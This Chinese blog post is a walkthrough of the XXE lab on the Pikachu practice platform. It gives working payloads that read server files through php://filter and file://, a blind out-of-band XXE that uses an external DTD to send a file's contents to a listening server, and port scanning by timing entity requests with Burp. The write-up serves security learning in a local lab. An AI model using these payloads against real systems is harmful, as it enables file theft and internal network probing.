pikachu-xxe

最新推荐文章于 2024-05-13 10:46:10 发布
最新推荐文章于 2024-05-13 10:46:10 发布
阅读量243 收藏
点赞数
分类专栏: pikachu 文章标签: java servlet mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/126937352
版权

有回显 

测试一下是否有xxe漏洞,且是否有回显

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe "11" > ]> 
<foo>&xxe;</foo>

 然后可以读取文件

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=d:/phpstudy_pro/WWW/pikachu/vul/rce/rce.php" > ]> 
<foo>&xxe;</foo>

file也可以 

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///d:/test.txt" > ]> 
<foo>&xxe;</foo>

无回显

把echo $html 注释掉

 

在输入框中输入 

<?xml version="1.0"?> 
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://127.0.0.1/test.dtd">
%dtd;
%send;
]>


这里的127.0.0.1是指本地

 在WWW下保存以test.dtd为名的文件

内容为

<!ENTITY % payload
	"<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/?data=%file;'>"
>
%payload;


这里127.0.0.1指目标网站

 然后就能在本地的日志里看到test.txt的内容了(要开访问日志权限)

扫描端口

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" > ]> 
<foo>&xxe;</foo>
<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "http://127.0.0.1:81" > ]> 
<foo>&xxe;</foo>

两个回显都是这样的报错信息

 但是扫描80端口会快,81会慢,因为80端口开放了

可以用burp批量爆破

选择端口 

 填好数据,然后开始爆破

把发包和返回包的时间间隔表示出来,再进行排序

选择 response received

点 response received进行排序

 但是这里面返回速度很快的,在网页上测试的时候还是回显很慢,感觉有点问题

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
十一、pikachu之XXE
qq_55202378的博客
08-25 495
pikachu XXE
pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)
箭雨镜屋
02-17 6298
一、来自官方的介绍以及来自民间的扩展 1、pikachu官方简介 2、小女子之前画的脑图 3、两个个人感觉不错的博客 https://www.freebuf.com/articles/web/177979.html https://lalajun.github.io/2019/12/03/WEB-XXE/ ...
Pikachu 靶场 XXE 通关解析
最新发布
Flag少侠的博客
05-13 1106
XXE漏洞(XML External Entity Injection)是一种安全漏洞,存在于使用XML解析器的应用程序中。攻击者可以利用XXE漏洞来读取服务器上的任意文件、执行远程请求、进行内部端口扫描等操作,甚至可能导致服务器拒绝服务攻击。XXE漏洞的原理是利用应用程序对外部实体的解析支持。XML实体是可以引用外部资源(如文件或URL)的独立实体。当应用程序在解析XML时,如果未正确配置解析器或没有禁用外部实体的引用,攻击者可以构造恶意的XML实体来触发XXE漏洞。]>
pikachu--XXE
firecjh的博客
06-10 287
3)查看PHP源代码。(文件路径以自己实际电脑为准)XXE进入测试页面。
Pikachu系列——XXE
Zlirving_的博客
05-22 1356
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验九 —— XXE XXE概述 xml外部实体注入 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 XML概念 XML是可扩展的标记语言,设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下: XML ----
pikachu-文件上传+XXE+不安全的url跳转
qq_47804678的博客
03-22 301
们可以看到,刚把文件上传,还没有点击“开始上传”就已将弹出了警示框,没有交互就已经检测了文件的类型,说明他是在前端进行校验的。那么我们看一下代码:选择浏览,可以看到代码中有一个checkfiletxt()的函数:我们尝试看一下这个函数,果然是他,然后把onchange值改为空,将这个函数删除:再次尝试上传php文件,发现成功上传。(但是只要重新刷新页面,代码就会恢复。服务端check尝试上传php文件,点击上传发现禁止上传,提示只能是图片格式:是一种标准化的方式来表示文档的性质和格式。
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻防...
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu-interpreter:神秘的编程语言“皮卡丘”的解释器
05-09
可以在找到名为“ pikachu”的深奥编程语言的定义安装$ git clone https://github.com/joelsmithjohnson/pikachu-interpreter$ cd pikachu-interpreter$ python setup.py install用法从命令行。 导航到您的Pikachu...
pikachu-xss.txt
06-10
pikachu-xss
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3624
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN 2.0//EN" "http://...
weixin_35750747的博客
01-12 3929
这段代码是一个XML文件,它声明了文件的类型和版本信息。其中, 是XML文档声明,用来告诉解析器文档使用的是XML 1.0版本并且采用UTF-8编码; 是文档类型声明,它告诉解析器使用的是Spring的DTD类型定义,并且指向这个DTD定义所在的位置。 ...
Pikachu漏洞平台练习——XXE实体类型举例、Blind OOB XXE、其他协议、XXE漏洞读取文件
7Riven's blog
11-14 1471
1.XXE概述 XXE-“xml external entity injection”,即xml外部实体注入。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 2.本地实体类型与外部的实体类型 本地实体类型举例说明如下: <?xml v...
pikachu之XXE漏洞
weixin_51446936的博客
06-18 1996
一、概述 XXE -“xml external entity injection”,即"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认
pikachu之xxe
qq_43665434的博客
02-19 436
pikachu之xxe XML基础知识 参考文章 一、什么是xxe? XXE即“xml external entity injection”即“xml外部实体注入漏洞”。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里对应的解析xml的函数默认是禁止解析xml外部实体内容的 就如在php中,对于xml的解析用的是libxml,在libxml版
pikachu--xxe
qq_43660551的博客
07-12 201
发现这里采用post方式传输数据,且没对xml参数进行过滤,simplexml_load_string()函数将用户传入的xml直接转换为SimpleXMLElement对象,故这里存在被篡改参数内容,造成xxe的漏洞。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。写一个正经的xml。
XXE漏洞利用笔记
weixin_45427650的博客
03-29 424
XML XML 被设计用来传输和存储数据。 HTML 被设计用来显示数据。 语法: 1、所有 XML 元素都须有关闭标签 2、XML 标签对大小写敏感 3、XML 必须正确地嵌套 4、XML 文档必须有根元素 5、XML 的属性值须加引号 6、在 XML 中,空格会被保留 DTD 教程 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。 DTD 可被成行地声明于 XML...
pikachu-XXE
koala_king的博客
03-21 155
根据提示构造 payload,让“pikachu”显示:<?> ]> &xxe;概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。既"xml外部实体注入漏洞"。随便输入一些内容,查看回显。
皮卡丘(pikachu)XXE
weixin_44787832的博客
07-23 2578
XXE漏洞 第一部分:XML声明部分 <?xml version="1.0"?> 第二部分:文档类型定义 DTD <!DOCTYPE note[ <!--定义此文档是note类型的文档--> <!ENTITY entity-name SYSTEM "URI/URL"> <!--外部实体声明--> ]> 第三部分:文档元素 <note> <to>Dave</to> <from>T

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值